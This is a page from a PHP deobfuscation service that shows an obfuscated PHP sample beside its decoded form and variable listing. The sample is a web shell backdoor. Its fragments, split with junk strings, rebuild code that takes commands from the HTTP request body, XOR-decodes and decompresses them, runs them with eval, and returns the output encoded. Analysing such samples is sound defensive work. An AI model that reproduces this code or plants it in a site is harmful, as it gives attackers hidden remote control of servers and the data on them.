Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87..

Decoded Output download

<?  $V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($'; 
$P='++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents('; 
$d='u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i'; 
$B='ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}'; 
$N='create_function'; 
$c='"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@'; 
$u=str_replace('u)','',$V.$d.$P.$c.$B); ?>

Did this file decode correctly?

Original Code

$V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($';
$P='++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';
$d='u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';
$B='ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}';
$N='create_function';
$c='"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';
$u=str_replace('u)','',$V.$d.$P.$c.$B);

Function Calls

str_replace 1

Variables

$B ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)..
$N create_function
$P ++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_..
$V $k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9..
$c "php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)n..
$d u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i..
$u $k="80e32263";$kh="6f8af44abea0";$kf="351039f4a7b5";$p="0UlY..

Stats

MD5 7696df421942c1931da4a044c73a520c
Eval Count 0
Decode Time 50 ms